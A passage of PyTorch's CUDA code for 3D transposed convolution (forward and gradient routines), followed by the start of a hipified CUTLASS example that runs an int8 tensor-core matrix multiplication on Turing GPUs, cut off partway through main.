slow_conv_transpose3d_out_cuda_template( Tensor& output, const Tensor& input_, const Tensor& weight_, IntArrayRef kernel_size, const Tensor& bias_, IntArrayRef stride, IntArrayRef padding, IntArrayRef output_padding, IntArrayRef dilation) { TORCH_CHECK( kernel_size.size() == 3, "It is expected kernel_size equals to 3, but got size ", kernel_size.size()); TORCH_CHECK( dilation.size() == 3, "It is expected dilation equals to 3, but got size ", dilation.size()); TORCH_CHECK( padding.size() == 3, "It is expected padding equals to 3, but got size ", padding.size()); TORCH_CHECK( stride.size() == 3, "It is expected stride equals to 3, but got size ", stride.size()); TORCH_CHECK( output_padding.size() == 3, "It is expected stride equals to 3, but got size ", output_padding.size()); int64_t kernel_depth = kernel_size[0]; int64_t kernel_height = kernel_size[1]; int64_t kernel_width = kernel_size[2]; int64_t dilation_depth = dilation[0]; int64_t dilation_height = dilation[1]; int64_t dilation_width = dilation[2]; int64_t padding_depth = padding[0]; int64_t padding_height = padding[1]; int64_t padding_width = padding[2]; int64_t stride_depth = stride[0]; int64_t stride_height = stride[1]; int64_t stride_width = stride[2]; int64_t output_padding_depth = output_padding[0]; int64_t output_padding_height = output_padding[1]; int64_t output_padding_width = output_padding[2]; int n_input_plane = weight_.size(0); int n_output_plane = weight_.size(1); TensorArg input_arg{input_, "input", 1}, output_arg{output, "output", 2}, weight_arg{weight_, "weight", 3}, bias_arg{bias_, "bias", 4}; checkAllSameGPU( "slow_conv_transpose3d_out_cuda", {input_arg, output_arg, weight_arg, bias_arg}); slow_conv_transpose3d_shape_check( input_, Tensor(), weight_, bias_, kernel_depth, kernel_width, kernel_height, stride_depth, stride_width, stride_height, padding_depth, padding_width, padding_height, dilation_depth, dilation_width, dilation_height, output_padding_depth, output_padding_width, output_padding_height, 0); Tensor input = input_.contiguous(); Tensor weight = weight_.contiguous(); Tensor bias = bias_.defined() ? bias_.contiguous() : bias_; int is_batch = false; if (input.dim() == 4) { // Force batch is_batch = true; input.resize_( {1, input.size(0), input.size(1), input.size(2), input.size(3)}); } int64_t input_width = input.size(4); int64_t input_height = input.size(3); int64_t input_depth = input.size(2); int64_t output_depth = (input_depth - 1) * stride_depth - 2 * padding_depth + (dilation_depth * (kernel_depth - 1) + 1) + output_padding_depth; int64_t output_height = (input_height - 1) * stride_height - 2 * padding_height + (dilation_height * (kernel_height - 1) + 1) + output_padding_height; int64_t output_width = (input_width - 1) * stride_width - 2 * padding_width + (dilation_width * (kernel_width - 1) + 1) + output_padding_width; // Batch size + input planes int64_t batch_size = input.size(0); // Resize output output.resize_( {batch_size, n_output_plane, output_depth, output_height, output_width}); // Create temporary columns Tensor columns = at::empty({n_output_plane * kernel_width * kernel_height * kernel_depth, input_depth * input_height * input_width}, input.options()); // Define a buffer of ones, for bias accumulation Tensor ones = bias.defined() ? at::ones({output_depth, output_height, output_width}, input_.options()) : Tensor(); AT_DISPATCH_FLOATING_TYPES_AND2(kHalf, kBFloat16, input.scalar_type(), "slow_conv_transpose3d_out_cuda", [&] { using accscalar_t = at::acc_type<scalar_t, true>; // Helpers Tensor input_n; Tensor output_n; // For each elt in batch, do: for (int elt = 0; elt < batch_size; elt++) { // Matrix mulitply per output: input_n = input.select(0, elt); output_n = output.select(0, elt); // M,N,K are dims of matrix A and B // (see http://docs.nvidia.com/cuda/cublas/#cublas-lt-t-gt-gemm) int64_t m = weight.size(1) * weight.size(2) * weight.size(3) * weight.size(4); int64_t n = columns.size(1); int64_t k = weight.size(0); // Do GEMM (note: this is a bit confusing because gemm assumes // column-major matrices) at::cuda::blas::gemm<scalar_t>( 'n', 't', n, m, k, static_cast<scalar_t>(1), input_n.const_data_ptr<scalar_t>(), n, weight.const_data_ptr<scalar_t>(), m, static_cast<scalar_t>(0), columns.mutable_data_ptr<scalar_t>(), n); // Unpack columns back into input: at::native::col2vol<scalar_t, accscalar_t>( at::cuda::getCurrentCUDAStream(), columns.const_data_ptr<scalar_t>(), n_output_plane, output_depth, output_height, output_width, input_depth, input_height, input_width, kernel_depth, kernel_height, kernel_width, padding_depth, padding_height, padding_width, stride_depth, stride_height, stride_width, dilation_depth, dilation_height, dilation_width, output_n.mutable_data_ptr<scalar_t>()); // Do Bias after: // M,N,K are dims of matrix A and B // (see http://docs.nvidia.com/cuda/cublas/#cublas-lt-t-gt-gemm) int64_t m_ = n_output_plane; int64_t n_ = output_depth * output_height * output_width; int64_t k_ = 1; // Do GEMM (note: this is a bit confusing because gemm assumes // column-major matrices) if (bias.defined()) { at::cuda::blas::gemm<scalar_t>( 't', 'n', n_, m_, k_, static_cast<scalar_t>(1), ones.const_data_ptr<scalar_t>(), k_, bias.const_data_ptr<scalar_t>(), k_, static_cast<scalar_t>(1), output_n.mutable_data_ptr<scalar_t>(), n_); } } // Resize output if (is_batch) { output.resize_( {n_output_plane, output_depth, output_height, output_width}); input.resize_( {n_input_plane, input_depth, input_height, input_width}); } }); } void slow_conv_transpose3d_backward_out_cuda_template( const Tensor& input_, const Tensor& grad_output_, Tensor& grad_input, const Tensor& weight_, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef output_padding, IntArrayRef dilation) { TORCH_CHECK( kernel_size.size() == 3, "It is expected kernel_size equals to 3, but got size ", kernel_size.size()); TORCH_CHECK( dilation.size() == 3, "It is expected dilation equals to 3, but got size ", dilation.size()); TORCH_CHECK( padding.size() == 3, "It is expected padding equals to 3, but got size ", padding.size()); TORCH_CHECK( stride.size() == 3, "It is expected stride equals to 3, but got size ", stride.size()); TORCH_CHECK( output_padding.size() == 3, "It is expected stride equals to 3, but got size ", output_padding.size()); int n_input_plane = weight_.size(0); int n_output_plane = weight_.size(1); int64_t kernel_depth = kernel_size[0]; int64_t kernel_height = kernel_size[1]; int64_t kernel_width = kernel_size[2]; int64_t dilation_depth = dilation[0]; int64_t dilation_height = dilation[1]; int64_t dilation_width = dilation[2]; int64_t padding_depth = padding[0]; int64_t padding_height = padding[1]; int64_t padding_width = padding[2]; int64_t stride_depth = stride[0]; int64_t stride_height = stride[1]; int64_t stride_width = stride[2]; int64_t output_padding_depth = output_padding[0]; int64_t output_padding_height = output_padding[1]; int64_t output_padding_width = output_padding[2]; TensorArg input_arg{input_, "input", 1}, grad_output_arg{grad_output_, "grad_output", 2}, weight_arg{weight_, "weight", 3}, grad_input_arg{grad_input, "grad_input", 4}; checkAllSameGPU( "slow_conv_transpose3d_backward_out_cuda", {input_arg, grad_output_arg, weight_arg, grad_input_arg}); slow_conv_transpose3d_shape_check( input_, grad_output_, weight_, Tensor(), kernel_depth, kernel_width, kernel_height, stride_depth, stride_width, stride_height, padding_depth, padding_width, padding_height, dilation_depth, dilation_width, dilation_height, output_padding_depth, output_padding_width, output_padding_height, 0); Tensor input = input_.contiguous(); Tensor grad_output = grad_output_.contiguous(); Tensor weight = weight_.contiguous(); bool is_batch = false; if (input.dim() == 4) { // Force batch is_batch = true; input.resize_( {1, input.size(0), input.size(1), input.size(2), input.size(3)}); grad_output.resize_({1, grad_output.size(0), grad_output.size(1), grad_output.size(2), grad_output.size(3)}); } int64_t input_width = input.size(4); int64_t input_height = input.size(3); int64_t input_depth = input.size(2); int64_t output_depth = (input_depth - 1) * stride_depth - 2 * padding_depth + (dilation_depth * (kernel_depth - 1) + 1) + output_padding_depth; int64_t output_height = (input_height - 1) * stride_height - 2 * padding_height + (dilation_height * (kernel_height - 1) + 1) + output_padding_height; int64_t output_width = (input_width - 1) * stride_width - 2 * padding_width + (dilation_width * (kernel_width - 1) + 1) + output_padding_width; // Batch size + input planes int64_t batch_size = input.size(0); // Resize output grad_input.resize_( {batch_size, n_input_plane, input_depth, input_height, input_width}); // Create temporary columns bool need_columns = (kernel_depth != 1 || kernel_height != 1 || kernel_width != 1 || stride_depth != 1 || stride_height != 1 || stride_width != 1 || dilation_depth != 1 || dilation_height != 1 || dilation_width != 1 || padding_depth != 0 || padding_height != 0 || padding_width != 0); Tensor grad_columns = need_columns ? at::empty({n_output_plane * kernel_width * kernel_height * kernel_depth, input_depth * input_height * input_width}, input.options()) : Tensor(); AT_DISPATCH_FLOATING_TYPES_AND2(kHalf, kBFloat16, input.scalar_type(), "slow_conv_transpose3d_backward_out_cuda", [&] { // Helpers Tensor grad_input_n; Tensor grad_output_n; // For each elt in batch, do: for (int elt = 0; elt < batch_size; elt++) { // Matrix mulitply per sample: grad_input_n = grad_input.select(0, elt); grad_output_n = grad_output.select(0, elt); if (need_columns) { // Extract columns: at::native::vol2col<scalar_t>( at::cuda::getCurrentCUDAStream(), grad_output_n.const_data_ptr<scalar_t>(), n_output_plane, output_depth, output_height, output_width, input_depth, input_height, input_width, kernel_depth, kernel_height, kernel_width, padding_depth, padding_height, padding_width, stride_depth, stride_height, stride_width, dilation_depth, dilation_height, dilation_width, grad_columns.mutable_data_ptr<scalar_t>()); } // M,N,K are dims of matrix A and B // (see http://docs.nvidia.com/cuda/cublas/#cublas-lt-t-gt-gemm) int64_t m = weight.size(0); int64_t n = input_depth * input_height * input_width; int64_t k = weight.size(1) * weight.size(2) * weight.size(3) * weight.size(4); // Do GEMM (note: this is a bit confusing because gemm assumes // column-major matrices) auto gemm_in_ptr = need_columns ? grad_columns.const_data_ptr<scalar_t>() : grad_output_n.const_data_ptr<scalar_t>(); at::cuda::blas::gemm<scalar_t>( 'n', 'n', n, m, k, static_cast<scalar_t>(1), gemm_in_ptr, n, weight.const_data_ptr<scalar_t>(), k, static_cast<scalar_t>(0), grad_input_n.mutable_data_ptr<scalar_t>(), n); } // Resize output if (is_batch) { grad_output.resize_( {n_output_plane, output_depth, output_height, output_width}); input.resize_( {n_input_plane, input_depth, input_height, input_width}); grad_input.resize_( {n_input_plane, input_depth, input_height, input_width}); } }); } void slow_conv_transpose3d_acc_grad_parameters_cuda( const Tensor& input_, const Tensor& grad_output_, Tensor& grad_weight, Tensor& grad_bias, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef output_padding, IntArrayRef dilation, int scale_) { TORCH_CHECK( kernel_size.size() == 3, "It is expected kernel_size equals to 3, but got size ", kernel_size.size()); TORCH_CHECK( dilation.size() == 3, "It is expected dilation equals to 3, but got size ", dilation.size()); TORCH_CHECK( padding.size() == 3, "It is expected padding equals to 3, but got size ", padding.size()); TORCH_CHECK( stride.size() == 3, "It is expected stride equals to 3, but got size ", stride.size()); TORCH_CHECK( output_padding.size() == 3, "It is expected stride equals to 3, but got size ", output_padding.size()); int64_t kernel_depth = kernel_size[0]; int64_t kernel_height = kernel_size[1]; int64_t kernel_width = kernel_size[2]; int64_t dilation_depth = dilation[0]; int64_t dilation_height = dilation[1]; int64_t dilation_width = dilation[2]; int64_t padding_depth = padding[0]; int64_t padding_height = padding[1]; int64_t padding_width = padding[2]; int64_t stride_depth = stride[0]; int64_t stride_height = stride[1]; int64_t stride_width = stride[2]; int64_t output_padding_depth = output_padding[0]; int64_t output_padding_height = output_padding[1]; int64_t output_padding_width = output_padding[2]; TensorArg input_arg{input_, "input", 1}, grad_output_arg{grad_output_, "grad_output", 2}, grad_weight_arg{grad_weight, "grad_weight", 3}, grad_bias_arg{grad_bias, "grad_bias", 4}; checkAllSameGPU( "slow_conv_transpose3d_acc_grad_parameters_cuda", {input_arg, grad_output_arg, grad_weight_arg, grad_bias_arg}); slow_conv_transpose3d_shape_check( input_, grad_output_, grad_weight, grad_bias, kernel_depth, kernel_width, kernel_height, stride_depth, stride_width, stride_height, padding_depth, padding_width, padding_height, dilation_depth, dilation_width, dilation_height, output_padding_depth, output_padding_width, output_padding_height, 1); int n_output_plane; if (grad_weight.defined()) { n_output_plane = grad_weight.size(1); } else if (grad_bias.defined()) { n_output_plane = grad_bias.size(0); } else { return; } if (grad_weight.defined()) { TORCH_CHECK( grad_weight.is_contiguous(), "grad_weight needs to be contiguous"); } if (grad_bias.defined()) { TORCH_CHECK(grad_bias.is_contiguous(), "grad_bias needs to be contiguous"); } Tensor input = input_.contiguous(); Tensor grad_output = grad_output_.contiguous(); bool is_batch = false; if (input.dim() == 4) { // Force batch is_batch = true; input.resize_( {1, input.size(0), input.size(1), input.size(2), input.size(3)}); grad_output.resize_({1, grad_output.size(0), grad_output.size(1), grad_output.size(2), grad_output.size(3)}); } int64_t input_width = input.size(4); int64_t input_height = input.size(3); int64_t input_depth = input.size(2); int64_t output_depth = (input_depth - 1) * stride_depth - 2 * padding_depth + (dilation_depth * (kernel_depth - 1) + 1) + output_padding_depth; int64_t output_height = (input_height - 1) * stride_height - 2 * padding_height + (dilation_height * (kernel_height - 1) + 1) + output_padding_height; int64_t output_width = (input_width - 1) * stride_width - 2 * padding_width + (dilation_width * (kernel_width - 1) + 1) + output_padding_width; // Batch size + input planes int64_t batch_size = input.size(0); // Create temporary columns bool need_columns = (kernel_depth != 1 || kernel_height != 1 || kernel_width != 1 || stride_depth != 1 || stride_height != 1 || stride_width != 1 || dilation_depth != 1 || dilation_height != 1 || dilation_width != 1 || padding_depth != 0 || padding_height != 0 || padding_width != 0); Tensor columns = need_columns ? at::empty({n_output_plane * kernel_width * kernel_height * kernel_depth, input_depth * input_height * input_width}, input.options()) : Tensor(); AT_DISPATCH_FLOATING_TYPES_AND2(kHalf, kBFloat16, input.scalar_type(), "slow_conv_transpose3d_acc_grad_parameters_cuda", [&] { // Helpers Tensor input_n; Tensor grad_output_n; scalar_t scale = static_cast<scalar_t>(scale_); // For each elt in batch, do: for (int elt = 0; elt < batch_size; elt++) { // Matrix mulitply per output: grad_output_n = grad_output.select(0, elt); // Do Weight: if (grad_weight.defined()) { // Matrix mulitply per output: input_n = input.select(0, elt); if (need_columns) { // Extract columns: at::native::vol2col<scalar_t>( at::cuda::getCurrentCUDAStream(), grad_output_n.const_data_ptr<scalar_t>(), n_output_plane, output_depth, output_height, output_width, input_depth, input_height, input_width, kernel_depth, kernel_height, kernel_width, padding_depth, padding_height, padding_width, stride_depth, stride_height, stride_width, dilation_depth, dilation_height, dilation_width, columns.mutable_data_ptr<scalar_t>()); } // M,N,K are dims of matrix A and B // (see http://docs.nvidia.com/cuda/cublas/#cublas-lt-t-gt-gemm) int64_t n = n_output_plane * kernel_width * kernel_height * kernel_depth; int64_t m = input_n.size(0); // n_input_plane int64_t k = input_depth * input_height * input_width; // Do GEMM (note: this is a bit confusing because gemm assumes // column-major matrices) auto gemm_in_ptr = need_columns ? columns.const_data_ptr<scalar_t>() : grad_output_n.const_data_ptr<scalar_t>(); at::cuda::blas::gemm<scalar_t>( 't', 'n', n, m, k, scale, gemm_in_ptr, k, input_n.const_data_ptr<scalar_t>(), k, static_cast<scalar_t>(1), grad_weight.mutable_data_ptr<scalar_t>(), n); } } if (grad_bias.defined()) { at::sum_out(grad_bias, grad_output, IntArrayRef{0, 2, 3, 4}); } // Resize if (is_batch) { grad_output.resize_( {n_output_plane, output_depth, output_height, output_width}); input.resize_( {input.size(1), input_depth, input_height, input_width}); } }); } } // namespace Tensor& slow_conv_transpose3d_out_cuda(const Tensor& input, const Tensor& weight, IntArrayRef kernel_size, const c10::optional<Tensor>& bias_opt, IntArrayRef stride, IntArrayRef padding, IntArrayRef output_padding, IntArrayRef dilation, Tensor& output) { // See [Note: hacky wrapper removal for optional tensor] c10::MaybeOwned<Tensor> bias_maybe_owned = at::borrow_from_optional_tensor(bias_opt); const Tensor& bias = *bias_maybe_owned; slow_conv_transpose3d_out_cuda_template( output, input, weight, kernel_size, bias, stride, padding, output_padding, dilation); return output; } Tensor slow_conv_transpose3d_cuda( const Tensor& input, const Tensor& weight, IntArrayRef kernel_size, const c10::optional<Tensor>& bias_opt, IntArrayRef stride, IntArrayRef padding, IntArrayRef output_padding, IntArrayRef dilation) { // See [Note: hacky wrapper removal for optional tensor] c10::MaybeOwned<Tensor> bias_maybe_owned = at::borrow_from_optional_tensor(bias_opt); const Tensor& bias = *bias_maybe_owned; Tensor output = at::empty_like(input, LEGACY_CONTIGUOUS_MEMORY_FORMAT); slow_conv_transpose3d_out_cuda_template( output, input, weight, kernel_size, bias, stride, padding, output_padding, dilation); return output; } std::tuple<Tensor&, Tensor&, Tensor&> slow_conv_transpose3d_backward_out_cuda(const Tensor& grad_output, const Tensor& input, const Tensor& weight, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef output_padding, IntArrayRef dilation, Tensor& grad_input, Tensor& grad_weight, Tensor& grad_bias) { if (grad_input.defined()) { slow_conv_transpose3d_backward_out_cuda_template( input, grad_output, grad_input, weight, kernel_size, stride, padding, output_padding, dilation); } if (grad_weight.defined()) { grad_weight.resize_(weight.sizes()); grad_weight.zero_(); } if (grad_bias.defined()) { grad_bias.resize_({weight.size(1)}); grad_bias.zero_(); } if (grad_weight.defined() || grad_bias.defined()) { slow_conv_transpose3d_acc_grad_parameters_cuda( input, grad_output, grad_weight, grad_bias, kernel_size, stride, padding, output_padding, dilation, 1); } return std::tuple<Tensor&, Tensor&, Tensor&>( grad_input, grad_weight, grad_bias); } std::tuple<Tensor, Tensor, Tensor> slow_conv_transpose3d_backward_cuda( const Tensor& grad_output, const Tensor& input, const Tensor& weight, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef output_padding, IntArrayRef dilation, std::array<bool, 3> output_mask) { Tensor grad_input; Tensor grad_weight; Tensor grad_bias; if (output_mask[0]) { grad_input = at::empty({0}, grad_output.options()); } else { grad_input = Tensor(); } if (output_mask[1]) { grad_weight = at::empty({0}, grad_output.options()); } else { grad_weight = Tensor(); } if (output_mask[2]) { grad_bias = at::empty({0}, grad_output.options()); } else { grad_bias = Tensor(); } if (grad_input.defined()) { slow_conv_transpose3d_backward_out_cuda_template( input, grad_output, grad_input, weight, kernel_size, stride, padding, output_padding, dilation); } if (grad_weight.defined()) { grad_weight.resize_(weight.sizes()); grad_weight.zero_(); } if (grad_bias.defined()) { grad_bias.resize_({weight.size(1)}); grad_bias.zero_(); } if (grad_weight.defined() || grad_bias.defined()) { slow_conv_transpose3d_acc_grad_parameters_cuda( input, grad_output, grad_weight, grad_bias, kernel_size, stride, padding, output_padding, dilation, 1); } return std::tuple<Tensor, Tensor, Tensor>(grad_input, grad_weight, grad_bias); } REGISTER_CUDA_DISPATCH(slow_conv_transpose3d_backward_stub, &slow_conv_transpose3d_backward_cuda); } // namespace at::native
0699e8415e9039caef46daf879eba05cbb7209a8.hip
// !!! This is a file automatically generated by hipify!!! /*************************************************************************************************** * Copyright (c) 2017-2019, NVIDIA CORPORATION. All rights reserved. * * Redistribution and use in source and binary forms, with or without modification, are permitted * provided that the following conditions are met: * * Redistributions of source code must retain the above copyright notice, this list of * conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above copyright notice, this list of * conditions and the following disclaimer in the documentation and/or other materials * provided with the distribution. * * Neither the name of the NVIDIA CORPORATION nor the names of its contributors may be used * to endorse or promote products derived from this software without specific prior written * permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND * FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL NVIDIA CORPORATION BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, * STRICT LIABILITY, OR TOR (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * **************************************************************************************************/ /** This example shows how to run matrix multiplication kernels using functions and data structures provided by CUTLASS using tensor cores; which we run on a NVIDIA Turing GPU. Writing a single high performance matrix multiplication kernel is hard but do-able. Whereas writing high performance kernels at scale which works for multiple problem sizes with good abstractions is really hard. CUTLASS solves this problem by providing simplified abstractions to compose multiple sections of gemm kernel. When used properly, the kernels can hit peak performance of GPU easily. CUTLASS divides a kernel into hierarchical composable sections. Which means, at each thread, warp and thread-block level, they compute on their own tile-size with higher level of tile sizes being composed from lower level ones. Multiple thread-tiles (tile size each thread computes) can be used to form warp-tiles (tile size each warp computes) and multiple warp tiles can be used to compute threadblock-tile (tile size computed by a threadblock). In thie example, we split variable initialization into 1. Setting up data properties : describes how matrices are laid out in the memory and how the kernel can view them (logical to physical mapping) 2. Setting up computation properties : describes how the above set matrices will be used to compute output of matrix multiplication. First, we setup the data types of matrices A, B, C and D along with alpha, beta as the equation for GEMM is D = alpha * A * B + beta * C. In CUTLASS, the kernels first compute A * B and leaves the rest of the computation to end of the kernel as alpha * X + beta * C is a simple element-wise operation on X (A * B) and C. We call this as epilogue of kernel. Hence, we setup data types for alpha and beta to be equal to ElementComputeEpilogue = int32_t. As we want to use MMA instructions on Turing and they support 8-bit signed integer (int8_t), we use data type for elements in input matrix A and B as int8_t. Volta also supports accumulation of partial dot product to int32_t, which can store wider range of numbers, we use it as data type of output matrix elements and accumulation. We convey this to CUTLASS kernel by initializing template variables ElementAccumulator (int32_t), ElementComputeEpilogue (int32_t), ElementInputA (int8_t), ElementInputB (int8_t), ElementOutput (int32_t). Communicating just the data type is not enough. As the data is laid out linearly in memory, we have to convey the layout of matrices. We do that by initializing template variable LayoutInputA to column major cutlass variable, LayoutInputB to row major and LayoutOutput to row major. Next, we setup rules to comptue alpha * X + beta * C which is called epilogue of the kernel. We initialize template variable EpilogueOp, which takes the data type of output ElementOutput (int32_t), the number of elements per vector memory access (16), data type of accumulator (int32_t) and data type of computation of linear combination (alpha * X + beta * C). Now that we setup the properties of data, we have to setup properties of computation. Second, we create template variables of tile sizes for thread-block, warp and mma-op to 128x256x64, 64x64x16, 8x8x16 (MxNxK) respectively. When passed to instantiate CUTLASS GEMM kernel, it internally deduce the amount of threads needed per thread-block, amount of shared memory, storing data in bank-conflict free manner, and ton of other variables required to compose, intialize and launch a high performance GEMM kernel. This is the beauty of CUTLASS, it relieves developer from understanding and coding complicated hardware optimizations which can easily go wrong. CUTLASS also supports multiple MMA pipelines in a threadblock. What are MMA pipelines? MMA pipelines constitute the whole process of loading input data from global memory to shared memory, loading data from shared memory to registers, doing matrix multiplication, store to global memory. The below flow sequence shows a typical mma pipeline. matrix in global memory -> registers -> tile in shared memory -> registers -> mma -> registers -> output to global memory The problem with single pipeline is, each stage is synchronous which means, each stage has to wait until the previous finished executing. There are stages in the pipeline which do not have fixed latency, for example, the loads from global memory and shared memory. Therefore, we can add one more pipeline with a phase shift in mma kernel to hide latency from global and shared memory loads. Finally, the pipeline in a kernel looks like (1) matrix in global memory -> (2) registers -> (3) tile in shared memory -> (4) registers -> (5) mma -> (6) registers -> (7) output to global memory (1) <null> -> (2) <null> -> (3) matrix in global memory -> (4) registers -> (5) tile in shared memory -> (6) registers -> (7) mma -> (8) registers -> (9) output to global memory This way, you can hide the second global memoroy load latency by doing computation on already loaded input data. There are few more template variables initialized such as, which threadblock tile of output matrix is done which threadblock launched on an SM, CUDA SM architecture of GPU you want to run on. These are all put together to create a template variable which describes CUTLASS GEMM kernel using cutlass::gemm::device::Gemm template. The next step is to intialize physical data, instantiate and initialize CUTLASS kernel and run it. We use CUTLASS utilities to initialize, fill, compare matrices as they are simple and doesn't come in the way of learning CUTLASS. Once all the matrices are initialized and filled with data, create arguments tuple to launch CUTLASS kernel which takes problem size (M = 5120, N = 4096 and K = 4096), matrices, alpha, beta and the important one, split k-dimension factor. Along with that, we query CUTLASS if any scratch-space memory required by the kernel we instantiated. If yes, we create it and pass it along with other arguments created to intialize CUTLASS kernel then, the kernel is launched. In this example, we later on launch a reference gemm kernel (from CUTLASS utilities) to compare if the output from CUTLASS kernel is same as reference GEMM kernel. */ #include <iostream> #include "cutlass/cutlass.h" #include "cutlass/gemm/device/gemm.h" #include "cutlass/util/host_tensor.h" #include "cutlass/util/reference/device/gemm.h" #include "cutlass/util/reference/host/tensor_compare.h" #include "cutlass/util/reference/host/tensor_copy.h" #include "cutlass/util/reference/host/tensor_fill.h" #include "cutlass/util/tensor_view_io.h" #include "helper.h" // The code section below describes datatype for input, output matrices and computation between // elements in input matrices. using ElementAccumulator = int32_t; // <- data type of accumulator using ElementComputeEpilogue = ElementAccumulator; // <- data type of epilogue operations using ElementInputA = int8_t; // <- data type of elements in input matrix A using ElementInputB = int8_t; // <- data type of elements in input matrix B using ElementOutput = int32_t; // <- data type of elements in output matrix D // The code section below describes matrix layout of input and output matrices. Column Major for // Matrix A, Row Major for Matrix B and Row Major for Matrix C using LayoutInputA = cutlass::layout::RowMajor; using LayoutInputB = cutlass::layout::ColumnMajor; using LayoutOutput = cutlass::layout::RowMajor; // This code section describes whether you want to use tensor cores or regular SIMT cores on GPU SM using MMAOp = cutlass::arch::OpClassTensorOp; // This code section describes CUDA SM architecture number using SmArch = cutlass::arch::Sm75; // This code section describes the tile size a thread block will compute using ShapeMMAThreadBlock = cutlass::gemm::GemmShape<128, 256, 64>; // <- threadblock tile M = 128, N = 256, K = 64 // This code section describes tile size a warp will compute using ShapeMMAWarp = cutlass::gemm::GemmShape<64, 64, 64>; // <- warp tile M = 64, N = 64, K = 16 // This code section describes the size of MMA op using ShapeMMAOp = cutlass::gemm::GemmShape<8, 8, 16>; // <- MMA Op tile M = 8, N = 8, K = 16 // This code section describes how threadblocks are scheduled on GPU using SwizzleThreadBlock = cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle; // <- ?? // This code section describes the epilogue part of the kernel using EpilogueOp = cutlass::epilogue::thread::LinearCombination< ElementOutput, // <- data type of output matrix 128 / cutlass::sizeof_bits<ElementOutput>::value, // <- the number of elements per vectorized // memory access. For a byte, it's 16 // elements. This becomes the vector width of // math instructions in the epilogue too ElementAccumulator, // <- data type of accumulator ElementComputeEpilogue>; // <- data type for alpha/beta in linear combination function // Number of pipelines you want to use constexpr int NumStages = 2; using Gemm = cutlass::gemm::device::Gemm<ElementInputA, LayoutInputA, ElementInputB, LayoutInputB, ElementOutput, LayoutOutput, ElementAccumulator, MMAOp, SmArch, ShapeMMAThreadBlock, ShapeMMAWarp, ShapeMMAOp, EpilogueOp, SwizzleThreadBlock, NumStages>; int main() { // Turing Tensor Core operations exposed with mma.sync and ldmatrix are first available // in CUDA 10.2. // // CUTLASS must be compiled with CUDA 10.2 Toolkit to run these examples. if (!(__CUDACC_VER_MAJOR__ > 10 || (__CUDACC_VER_MAJOR__ == 10 && __CUDACC_VER_MINOR__ >= 2))) { std::cerr << "Turing Tensor Core operations must be compiled with CUDA 10.2 Toolkit or later." << std::endl; return -1; } hipDeviceProp_t props; hipError_t error = hipGetDeviceProperties(&props, 0); if (error != hipSuccess) { std::cerr << "hipGetDeviceProperties() returned an error: " << hipGetErrorString(error) << std::endl; return -1; } if (!((props.major * 10 + props.minor) >= 75)) { std::cerr << "Turing Tensor Core operations must be run on a machine with compute capability at least 75." << std::endl; return -1; } const int length_m = 5120; const int length_n = 4096; const int length_k = 4096; // Create a tuple of problem size for matrix multiplication cutlass::gemm::GemmCoord problem_size(length_m, length_n, length_k); // Initialize tensors using CUTLASS helper functions cutlass::HostTensor<ElementInputA, LayoutInputA> tensor_a( problem_size.mk()); // <- Create matrix A with dimensions M x K cutlass::HostTensor<ElementInputB, LayoutInputB> tensor_b( problem_size.nk()); // <- Create matrix B with dimensions N x K cutlass::HostTensor<ElementOutput, LayoutOutput> tensor_c( problem_size.mn()); // <- Create matrix C with dimensions M x N cutlass::HostTensor<ElementOutput, LayoutOutput> tensor_d( problem_size.mn()); // <- Create matrix D with dimensions M x N used to store output from // CUTLASS kernel cutlass::HostTensor<ElementOutput, LayoutOutput> tensor_ref_d( problem_size.mn()); // <- Create matrix D with dimensions M x N used to store output from // reference kernel // Fill input and output matrices on host using CUTLASS helper functions cutlass::reference::host::TensorFillRandomUniform( tensor_a.host_view(), 1, ElementInputA(4), ElementInputA(-4), 0); // <- Fill matrix A on host with uniform-distribution random data cutlass::reference::host::TensorFillRandomUniform( tensor_b.host_view(), 1, ElementInputB(4), ElementInputB(-4), 0); // <- Fill matrix B on host with uniform-distribution random data cutlass::reference::host::TensorFillRandomUniform( tensor_c.host_view(), 1, ElementOutput(4), ElementOutput(-4), 0); // <- Fill matrix C on host with uniform-distribution random data cutlass::reference::host::TensorFill( tensor_d.host_view()); // <- fill matrix D on host with zeros cutlass::reference::host::TensorFill( tensor_ref_d.host_view()); // <- fill matrix D for reference on host with zeros // Copy data from host to GPU tensor_a.sync_device(); tensor_b.sync_device(); tensor_c.sync_device(); tensor_d.sync_device(); tensor_ref_d.sync_device(); // Initialize alpha and beta for dot product computation ElementComputeEpilogue alpha = ElementComputeEpilogue(1); ElementComputeEpilogue beta = ElementComputeEpilogue(0); // Split K dimension into 1 partitions int split_k_slices = 1; // Create a tuple of gemm kernel arguments. This is later passed as arguments to launch // instantiated CUTLASS kernel typename Gemm::Arguments arguments{problem_size, // <- problem size of matrix multiplication tensor_a.device_ref(), // <- reference to matrix A on device tensor_b.device_ref(), // <- reference to matrix B on device tensor_c.device_ref(), // <- reference to matrix C on device tensor_d.device_ref(), // <- reference to matrix D on device {alpha, beta}, // <- tuple of alpha and beta split_k_slices}; // <- k-dimension split factor // Using the arguments, query for extra workspace required for matrix multiplication computation size_t workspace_size = Gemm::get_workspace_size(arguments); // Allocate workspace memory cutlass::device_memory::allocation<uint8_t> workspace(workspace_size); // Instantiate CUTLASS kernel depending on templates Gemm gemm_op; // Initialize CUTLASS kernel with arguments and workspace 